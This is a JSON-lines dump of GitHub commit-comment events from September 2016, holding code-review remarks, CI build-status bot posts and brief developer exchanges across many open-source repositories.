{"id":"4592301186","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103551,"position":19,"line":19,"path":"player_actions.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:34:07Z","updated_at":"2016-09-20T20:34:07Z","body":"these var names are a bit verbose - leads to very long line"}},"created_at":"2016-09-20T20:34:07Z"}
{"id":"4592303390","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19103556,"position":null,"line":null,"path":null,"commit_id":"6dabad1a7ff842fc3e564276c1ba7168d1cb7cc5","created_at":"2016-09-20T20:34:28Z","updated_at":"2016-09-20T20:34:28Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6dabad1a7ff842fc3e564276c1ba7168d1cb7cc5-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6dabad1a7ff842fc3e564276c1ba7168d1cb7cc5-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T20:34:28Z"}
{"id":"4592304824","type":"CommitCommentEvent","actor":{"login":"TehNut"},"repo":{"name":"Arcaratus/BloodArsenal"},"payload":{"comment":{"id":19103564,"position":null,"line":null,"path":null,"commit_id":"f5fc3bd7e952073259d545930716de9ac2609fc9","created_at":"2016-09-20T20:34:44Z","updated_at":"2016-09-20T20:34:44Z","body":"Did you download the zip instead of cloning the project?"}},"created_at":"2016-09-20T20:34:44Z"}
{"id":"4592305819","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103566,"position":37,"line":37,"path":"player_actions.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:34:55Z","updated_at":"2016-09-20T20:34:55Z","body":"get rid of no action result?"}},"created_at":"2016-09-20T20:34:55Z"}
{"id":"4592306736","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19103569,"position":10,"line":90,"path":"applet/src/os.c","commit_id":"da19622086cfbc1ec790797f2302b72463dca4a8","created_at":"2016-09-20T20:35:05Z","updated_at":"2016-09-20T20:35:05Z","body":"@aeickho thnks. interesting. not used at the moment in this specific call. i left the code commented."}},"created_at":"2016-09-20T20:35:05Z"}
{"id":"4592308667","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19103574,"position":null,"line":null,"path":null,"commit_id":"22240a418d26b5745c6447303555cb9004afd8b3","created_at":"2016-09-20T20:35:23Z","updated_at":"2016-09-20T20:35:23Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#MwXUdGbnRdKSu4H7-SvCng"}},"created_at":"2016-09-20T20:35:23Z"}
{"id":"4592309020","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103575,"position":16,"line":16,"path":"player_actions.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:35:27Z","updated_at":"2016-09-20T20:35:27Z","body":"possible to refactor if?"}},"created_at":"2016-09-20T20:35:27Z"}
{"id":"4592309050","type":"CommitCommentEvent","actor":{"login":"zloirock"},"repo":{"name":"kangax/compat-table"},"payload":{"comment":{"id":19103576,"position":null,"line":null,"path":null,"commit_id":"b0e34dc0c096e07ac13e682f029f5046da95493e","created_at":"2016-09-20T20:35:27Z","updated_at":"2016-09-20T20:35:27Z","body":"@chicoxyzzy I don't see TCO in Chrome 55 on OS X and Windows. That looks like #790"}},"created_at":"2016-09-20T20:35:27Z"}
{"id":"4592310385","type":"CommitCommentEvent","actor":{"login":"MikeLP"},"repo":{"name":"evgenyzinoviev/electron"},"payload":{"comment":{"id":19103580,"position":null,"line":null,"path":null,"commit_id":"7417821ad8f7ff6e9c669a3c3da35133c128f160","created_at":"2016-09-20T20:35:40Z","updated_at":"2016-09-20T20:35:40Z","body":"Hey. Do you have a time to create pull request to main repo? \r\nP.S.\r\nЕвгений, если не трудно, попроси их смержить если ты доделал. Поверь эта штука очень нужная. Спасибо!"}},"created_at":"2016-09-20T20:35:40Z"}
{"id":"4592312582","type":"CommitCommentEvent","actor":{"login":"patriciogonzalezvivo"},"repo":{"name":"tangrams/tron"},"payload":{"comment":{"id":19103585,"position":2,"line":2,"path":"layers/pois.yaml","commit_id":"b7f0d08c8808e2bf9a9a1250dafdf332678ec423","created_at":"2016-09-20T20:36:03Z","updated_at":"2016-09-20T20:36:03Z","body":"@bcamper I add this to solve temporally the problem... but with out this POIs don't show, claims can't find `components/textures.yaml`"}},"created_at":"2016-09-20T20:36:03Z"}
{"id":"4592312707","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19103586,"position":11,"line":92,"path":"templates/partials/contacts_content.html","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-20T20:36:05Z","updated_at":"2016-09-20T20:36:05Z","body":"I think it would be clearer to have the `ng-show` just on the `<span>` because that's the only bit that changes based on type, eg:\r\n\r\n```\r\n          <div ng-show=\"selected.doc.type === 'clinic'\" class=\"col-sm-6\">\r\n            <h4>\r\n              <i class=\"fa fa-user\"></i>\r\n              <span ng-show=\"selected.doc.type !== 'clinic'\" translate>People</span>\r\n              <span ng-show=\"selected.doc.type === 'clinic'\" translate>clinic.field.children</span>\r\n            </h4>\r\n          </div>\r\n```"}},"created_at":"2016-09-20T20:36:05Z"}
{"id":"4592322209","type":"CommitCommentEvent","actor":{"login":"jvanrijswijck"},"repo":{"name":"jvanrijswijck/jvanrijswijck.github.io"},"payload":{"comment":{"id":19103606,"position":null,"line":null,"path":null,"commit_id":"550a7f2b08050b7aae41f0a0884a6f5ddfd0d57d","created_at":"2016-09-20T20:37:45Z","updated_at":"2016-09-20T20:37:45Z","body":"Good job!"}},"created_at":"2016-09-20T20:37:45Z"}
{"id":"4592322243","type":"CommitCommentEvent","actor":{"login":"VladimirMangos"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19103607,"position":8,"line":1322,"path":"src/game/UnitAuraProcHandler.cpp","commit_id":"8913e29b6e5e69ef6eeb01ee79661f77bf08dc0d","created_at":"2016-09-20T20:37:45Z","updated_at":"2016-09-20T20:37:45Z","body":"        SpellAuraHolder* GetSpellAuraHolder(uint32 spellid, ObjectGuid casterGUID) const;\r\n?"}},"created_at":"2016-09-20T20:37:45Z"}
{"id":"4592324572","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103614,"position":27,"line":27,"path":"the_game.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:38:09Z","updated_at":"2016-09-20T20:38:09Z","body":"Printing description should not be handled as puts code here, can it be included in current location class?"}},"created_at":"2016-09-20T20:38:09Z"}
{"id":"4592326844","type":"CommitCommentEvent","actor":{"login":"karakum"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19103623,"position":null,"line":null,"path":null,"commit_id":"8a9c8a89532cbe403458793b92884ea53b58fcf0","created_at":"2016-09-20T20:38:32Z","updated_at":"2016-09-20T20:38:32Z","body":"@samdark, previous version just need to swap arguments, like;\r\n```php\r\n616:            if (isset($output, $output[1]) && strpos($output[1], 'CON') !== false) {\r\n617:                return $size = [(int) preg_replace('~\\D~', '', $output[4]), (int) preg_replace('~\\D~', '', $output[3])];\r\n618:            }\r\n```"}},"created_at":"2016-09-20T20:38:32Z"}
{"id":"4592332794","type":"CommitCommentEvent","actor":{"login":"Warlockbugs"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":19103632,"position":8,"line":1322,"path":"src/game/UnitAuraProcHandler.cpp","commit_id":"8913e29b6e5e69ef6eeb01ee79661f77bf08dc0d","created_at":"2016-09-20T20:39:33Z","updated_at":"2016-09-20T20:39:33Z","body":"This is a direct backport from Wrath. Needs to be optimized there too."}},"created_at":"2016-09-20T20:39:33Z"}
{"id":"4592333296","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103634,"position":23,"line":23,"path":"the_game.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:39:38Z","updated_at":"2016-09-20T20:39:38Z","body":"squash to one player prompt method?"}},"created_at":"2016-09-20T20:39:38Z"}
{"id":"4592335979","type":"CommitCommentEvent","actor":{"login":"hoodlum5235"},"repo":{"name":"DesignativeDave/androrat"},"payload":{"comment":{"id":19103637,"position":16,"line":60,"path":"README.md","commit_id":"df30f108bb53a76d55ee4cee33877aef798c9549","created_at":"2016-09-20T20:40:07Z","updated_at":"2016-09-20T20:40:07Z","body":"Fuckin"}},"created_at":"2016-09-20T20:40:07Z"}
{"id":"4592337622","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19103640,"position":null,"line":null,"path":null,"commit_id":"8a9c8a89532cbe403458793b92884ea53b58fcf0","created_at":"2016-09-20T20:40:22Z","updated_at":"2016-09-20T20:40:22Z","body":"Yes, that would work."}},"created_at":"2016-09-20T20:40:22Z"}
{"id":"4592341776","type":"CommitCommentEvent","actor":{"login":"hostilefork"},"repo":{"name":"zsx/r3"},"payload":{"comment":{"id":19103649,"position":null,"line":null,"path":null,"commit_id":"e8f2b39bf17f5e33deeb83a2fd286c93d05f7945","created_at":"2016-09-20T20:41:07Z","updated_at":"2016-09-20T20:41:07Z","body":"Just out of curiosity, are you *sure* the fib example which was working was a fully-built debug build?  Because I can imagine it would have worked if some setting somewhere was release...as the other functions are inline.\r\n\r\nJust seems physically impossible to find the Panic_Value_Debug library routine by name if there's no name set up!"}},"created_at":"2016-09-20T20:41:07Z"}
{"id":"4592342159","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19103652,"position":71,"line":184,"path":"static/css/material.less","commit_id":"acab37c898b6ad6206ed2ba6709b7f6e1a1bb629","created_at":"2016-09-20T20:41:11Z","updated_at":"2016-09-20T20:41:11Z","body":"This is the same styles as the class above - just comma separate the class names?"}},"created_at":"2016-09-20T20:41:11Z"}
{"id":"4592342624","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103653,"position":25,"line":25,"path":"the_game.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:41:17Z","updated_at":"2016-09-20T20:41:17Z","body":"instead of action result, update current location object using action methods, then pass back to the the_world object to update?"}},"created_at":"2016-09-20T20:41:17Z"}
{"id":"4592342991","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19103655,"position":31,"line":46,"path":"src/NodePainter.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T20:41:20Z","updated_at":"2016-09-20T20:41:20Z","body":"Orange looks cool btw"}},"created_at":"2016-09-20T20:41:20Z"}
{"id":"4592346825","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19103664,"position":null,"line":null,"path":null,"commit_id":"04e6966f32e822d4a8a6f9f9ad68fa01e2539588","created_at":"2016-09-20T20:42:02Z","updated_at":"2016-09-20T20:42:02Z","body":"Nice!"}},"created_at":"2016-09-20T20:42:02Z"}
{"id":"4592348103","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19103668,"position":18,"line":126,"path":"src/FlowGraphicsView.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T20:42:15Z","updated_at":"2016-09-20T20:42:15Z","body":"Minor: the project uses 2 spaces for indentation, not tabs."}},"created_at":"2016-09-20T20:42:15Z"}
{"id":"4592350238","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19103674,"position":null,"line":null,"path":null,"commit_id":"d45449904b12f491f87b6bb35d76d7e8a1a51ad2","created_at":"2016-09-20T20:42:39Z","updated_at":"2016-09-20T20:42:39Z","body":"fixBranchTransition (mitchute) - x86_64-MacOS-10.9-clang: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d45449904b12f491f87b6bb35d76d7e8a1a51ad2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d45449904b12f491f87b6bb35d76d7e8a1a51ad2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T20:42:39Z"}
{"id":"4592351722","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103679,"position":22,"line":22,"path":"world.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:42:55Z","updated_at":"2016-09-20T20:42:55Z","body":"Add print description method for location, item and character"}},"created_at":"2016-09-20T20:42:55Z"}
{"id":"4592356079","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19103688,"position":5,"line":510,"path":"translations/messages-en.properties","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-20T20:43:44Z","updated_at":"2016-09-20T20:43:44Z","body":"You shouldn't directly change (or delete) translations or they will be reverted in the next POE export. These have to be done through POE and exported which shows up as a separate commit. For more info: https://github.com/medic/medic-docs/blob/master/md/dev/translations.md#modifying-any-existing-translation-values"}},"created_at":"2016-09-20T20:43:44Z"}
{"id":"4592360052","type":"CommitCommentEvent","actor":{"login":"jagatfx"},"repo":{"name":"awslabs/aws-lambda-redshift-loader"},"payload":{"comment":{"id":19103696,"position":5,"line":349,"path":"setup-file.js","commit_id":"d0188cbb9a44d5321a81a9268bee6d9045e20e87","created_at":"2016-09-20T20:44:27Z","updated_at":"2016-09-20T20:44:27Z","body":"@IanMeyers  readLine (rl) is not available here other than what is mocked out and the idea with the file-based setup is to not have any prompts. I'll submit a patch shortly."}},"created_at":"2016-09-20T20:44:27Z"}
{"id":"4592360977","type":"CommitCommentEvent","actor":{"login":"MightyCreak"},"repo":{"name":"Sonerezh/sonerezh"},"payload":{"comment":{"id":19103701,"position":60,"line":211,"path":"app/Controller/SongsController.php","commit_id":"1feb86882f10919fe53c4e4e7747ab585cb5a350","created_at":"2016-09-20T20:44:37Z","updated_at":"2016-09-20T20:44:37Z","body":"Maybe this block and the one at line 171 could be factorized in a private method like `setAlbumsSortPref()`?"}},"created_at":"2016-09-20T20:44:37Z"}
{"id":"4592363827","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19103710,"position":5,"line":510,"path":"translations/messages-en.properties","commit_id":"5175464227e0812f244844bcda915f99d4859ec0","created_at":"2016-09-20T20:45:12Z","updated_at":"2016-09-20T20:45:12Z","body":"Secondly I'm not sure this should be titlecase. Why not \"Head of household\"?\r\n\r\nI've tried to work this out before and as far as I can tell there is no \"correct\" usage of titlecase in English grammar, so I try to avoid it everywhere."}},"created_at":"2016-09-20T20:45:12Z"}
{"id":"4592363882","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19103712,"position":14,"line":70,"path":"src/FlowScene.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T20:45:12Z","updated_at":"2016-09-20T20:45:12Z","body":"There is no guarantee that ```std::weak_ptr<Connection> conn``` is not empty. This is exactly the case when a node has no attached connections. \r\n```\r\nif (auto sharedConn = conn.lock())\r\n  deleteConnection(sharedConn);\r\n```"}},"created_at":"2016-09-20T20:45:12Z"}
{"id":"4592369158","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19103723,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T20:46:06Z","updated_at":"2016-09-20T20:46:06Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-20T20:46:06Z"}
{"id":"4592369512","type":"CommitCommentEvent","actor":{"login":"atesgoral"},"repo":{"name":"atesgoral/hrm-solutions"},"payload":{"comment":{"id":19103725,"position":37,"line":28,"path":"solutions/40-Prime-Factory-28.399/28.247-jdashton.asm","commit_id":"2fc5aeef1adea4df564f21623007e8812151674b","created_at":"2016-09-20T20:46:10Z","updated_at":"2016-09-20T20:46:10Z","body":"Weird... It's reported as 100% pass by CI. Maybe the tests are flawed... https://travis-ci.org/atesgoral/hrm-solutions/builds/157759626#L652"}},"created_at":"2016-09-20T20:46:10Z"}
{"id":"4592369528","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-analytics-plugin"},"payload":{"comment":{"id":19103726,"position":null,"line":null,"path":null,"commit_id":"acdcb299790cac58e60764322cf4953f81908f2f","created_at":"2016-09-20T20:46:10Z","updated_at":"2016-09-20T20:46:10Z","body":"👍 "}},"created_at":"2016-09-20T20:46:10Z"}
{"id":"4592369998","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19103728,"position":21,"line":77,"path":"src/FlowScene.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T20:46:14Z","updated_at":"2016-09-20T20:46:14Z","body":"After the fix above we can uncomment this"}},"created_at":"2016-09-20T20:46:14Z"}
{"id":"4592370714","type":"CommitCommentEvent","actor":{"login":"ledvinap"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19103729,"position":null,"line":null,"path":null,"commit_id":"21af8231c04489c595a6a729ec3fba61228f1197","created_at":"2016-09-20T20:46:21Z","updated_at":"2016-09-20T20:46:21Z","body":"Returning to timecops days?! "}},"created_at":"2016-09-20T20:46:21Z"}
{"id":"4592372679","type":"CommitCommentEvent","actor":{"login":"norizatonz"},"repo":{"name":"square/retrofit"},"payload":{"comment":{"id":19103731,"position":4,"line":206,"path":"retrofit/src/main/java/retrofit2/OkHttpCall.java","commit_id":"78b049143b5129b6d802b14c69f900b4089da33c","created_at":"2016-09-20T20:46:40Z","updated_at":"2016-09-20T20:46:40Z","body":"https://github.com/password_reset"}},"created_at":"2016-09-20T20:46:40Z"}
{"id":"4592374079","type":"CommitCommentEvent","actor":{"login":"solson"},"repo":{"name":"solson/miri"},"payload":{"comment":{"id":19103734,"position":21,"line":128,"path":"src/interpreter/terminator.rs","commit_id":"c1ae916a64395755a937fa4374f74093b1549221","created_at":"2016-09-20T20:46:55Z","updated_at":"2016-09-20T20:46:55Z","body":"Are you referring to the `expect(\"can't eval len\")`? Any problems that could cause would exist before this commit, too, since `eval_operand_to_primval` works just as well for `Lvalue`s (it gets a `Pointer` and calls `read_primval`).\r\n\r\nBut I see your point. The `len` or `index` operands could presumably evaluate to dangling `Pointer`s with the right abuse of unsafe code..."}},"created_at":"2016-09-20T20:46:55Z"}
{"id":"4592381214","type":"CommitCommentEvent","actor":{"login":"emufreak"},"repo":{"name":"emufreak/iAmiga"},"payload":{"comment":{"id":19103756,"position":null,"line":null,"path":null,"commit_id":"c99e911195ee0cf5f571c35ec4407db3ce1880b7","created_at":"2016-09-20T20:48:10Z","updated_at":"2016-09-20T20:48:10Z","body":"Unfortunately had to redo some of it to be compatible with iOS 7 and 8 :-(. Well at least it works now for all devices"}},"created_at":"2016-09-20T20:48:10Z"}
{"id":"4592384046","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19103766,"position":9,"line":65,"path":"src/FlowScene.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T20:48:38Z","updated_at":"2016-09-20T20:48:38Z","body":"I forgot to implement the destructor of NodeGraphicsObject -- my fault:\n\nNodeGraphicsObject::\n~NodeGraphicsObject()\n{\n  _scene.removeItem(this);\n}\n\nWith that and with my comments on github it seems to work.\n\n\nOn Tue, Sep 20, 2016 at 6:21 PM, MigFerreira <notifications@github.com>\nwrote:\n\n> Thanks for the explanation.\n> weak/shared pointers are new to me.\n>\n> Not to be troublesome but if you find any additional errors or bad\n> practices don't hesitate to point them out.\n>\n> Regards,\n> Miguel\n>\n>\n> Sent from Mailbird [http://www.getmailbird.com/?\n> utm_source=Mailbird&amp;utm_medium=email&amp;utm_campaign=\n> sent-from-mailbird]\n> On 20/09/2016 16:58:03, paceholder <notifications@github.com> wrote:\n> Just for your information.\n> This is a tricky C++ thing. The function lock() returns a temporary object\n> std::shared<Node>.\n> You can copy it to a local variable\n> std::shared_ptr<Node> node = ngo->node().lock();\n> In this case the inner counter in node gets increment and everything works\n> fine.\n> Temporary object is destroyed (with decrementing the counter).\n> Alternatively, you can bind it to const reference\n> std::shared_ptr<Node> const & node = ngo->node().lock();\n> C++ guarantees that temporary object bound to the const ref will exist\n> till the const ref goes out of scope.\n> However binding a temporary object to the non-const reference is an error:\n> std::shared_ptr<Node>& node = ngo->node().lock();\n> After the temporary object is bound to the reference it is destroyed.\n> Reference remains in an undefined state. It references a destroyed object.\n> See also: http://stackoverflow.com/questions/11560339/returning-\n> temporary-object-and-binding-to-const-reference [http://stackoverflow.com/\n> questions/11560339/returning-temporary-object-and-binding-\n> to-const-reference]\n> I will check a bit later why the code throws a segmentation fault.\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub [https://github.com/\n> MigFerreira/nodeeditor/commit/9ebda26996a5a9a0b98f7b20abc06b\n> 58706df80b#commitcomment-19098765], or mute the thread [\n> https://github.com/notifications/unsubscribe-auth/AAdn-\n> PrBz9kGSZ4g066ALNyf1tV10fpPks5qsAKGgaJpZM4KBzmP].\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MigFerreira/nodeeditor/commit/9ebda26996a5a9a0b98f7b20abc06b58706df80b#commitcomment-19099211>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AATtiHHDlXNdSdlIisPEukXd-oVOcUrUks5qsAf1gaJpZM4KBzmP>\n> .\n>\n"}},"created_at":"2016-09-20T20:48:38Z"}
{"id":"4592388139","type":"CommitCommentEvent","actor":{"login":"bdyckhoff"},"repo":{"name":"bdyckhoff/advengameture"},"payload":{"comment":{"id":19103774,"position":29,"line":29,"path":"world.rb","commit_id":"e374a23fb66f20ed3e82a9ba75baba5268126a92","created_at":"2016-09-20T20:49:20Z","updated_at":"2016-09-20T20:49:20Z","body":"could add relevant action methods to this class, called by action methods. then you don't have to pass data around as much.\r\ndef talk_to_location_character\r\ndef look_at location_item\r\ndef take_location_item/def add_to_inventory\r\ndef drop inventory_item/def add_to_location\r\ndef move.\r\nmethods sit in classes affected by player action, but are called by the resolve_action method."}},"created_at":"2016-09-20T20:49:20Z"}
{"id":"4592389468","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19103778,"position":5,"line":223,"path":"desktop/src/com/frostwire/gui/updates/UpdateMediator.java","commit_id":"e7a5331d31eae1b8f8b8531b15d2a3884e534534","created_at":"2016-09-20T20:49:32Z","updated_at":"2016-09-20T20:49:32Z","body":"lol, no clue why that got in there\r\n"}},"created_at":"2016-09-20T20:49:32Z"}
{"id":"4592389558","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19103780,"position":null,"line":null,"path":null,"commit_id":"33292be60050185d98dcfc765c1d5972362ff6b9","created_at":"2016-09-20T20:49:32Z","updated_at":"2016-09-20T20:49:32Z","body":"ASIHP-validation1 (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-33292be60050185d98dcfc765c1d5972362ff6b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-20T20:49:32Z"}
{"id":"4592389741","type":"CommitCommentEvent","actor":{"login":"stormylover249"},"repo":{"name":"electric-monk/360Controller"},"payload":{"comment":{"id":19103781,"position":5,"line":74,"path":"build","commit_id":"649b9712d2a2215e55776de06e1726e2bd626308","created_at":"2016-09-20T20:49:34Z","updated_at":"2016-09-20T20:49:34Z","body":"it dont work'\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-20T20:49:34Z"}
{"id":"4592391118","type":"CommitCommentEvent","actor":{"login":"VincenzoTarantini"},"repo":{"name":"movimento5/albo-pretorio-corato"},"payload":{"comment":{"id":19103782,"position":null,"line":null,"path":null,"commit_id":"b13ce381afbba0c14dc7a8be5b8d2a2cd31a3149","created_at":"2016-09-20T20:49:48Z","updated_at":"2016-09-20T20:49:48Z","body":"non mi piace avviso"}},"created_at":"2016-09-20T20:49:48Z"}
{"id":"4592396399","type":"CommitCommentEvent","actor":{"login":"rgarcia"},"repo":{"name":"Clever/wag"},"payload":{"comment":{"id":19103799,"position":null,"line":null,"path":null,"commit_id":"72dcb3eb93e3e7ceeda544c936d6e49e163c7609","created_at":"2016-09-20T20:50:39Z","updated_at":"2016-09-20T20:50:39Z","body":"👍 "}},"created_at":"2016-09-20T20:50:39Z"}
{"id":"4592399826","type":"CommitCommentEvent","actor":{"login":"johnathan99j"},"repo":{"name":"URN/URN-Material"},"payload":{"comment":{"id":19103817,"position":null,"line":null,"path":null,"commit_id":"2f4265194af610e048e295e1a972d423209cdb53","created_at":"2016-09-20T20:51:14Z","updated_at":"2016-09-20T20:51:14Z","body":"Whoops error in comit message, d6feeae not 6dfeeae !"}},"created_at":"2016-09-20T20:51:14Z"}
{"id":"4592401545","type":"CommitCommentEvent","actor":{"login":"damieng"},"repo":{"name":"atom/language-csharp"},"payload":{"comment":{"id":19103822,"position":null,"line":null,"path":null,"commit_id":"09c40e1b16d3ba34e2bcf2c92b97a08c7a3c0eef","created_at":"2016-09-20T20:51:29Z","updated_at":"2016-09-20T20:51:29Z","body":"Also allows usings inside of namespaces."}},"created_at":"2016-09-20T20:51:29Z"}
{"id":"4592402024","type":"CommitCommentEvent","actor":{"login":"joegoggins"},"repo":{"name":"markauskas/em-eventsource"},"payload":{"comment":{"id":19103823,"position":null,"line":null,"path":null,"commit_id":"ff602f13eae7995230d68099e92805e6db523ab6","created_at":"2016-09-20T20:51:34Z","updated_at":"2016-09-20T20:51:34Z","body":"👍  thanks for implementing this, glad i checked forks before i dove in!"}},"created_at":"2016-09-20T20:51:34Z"}
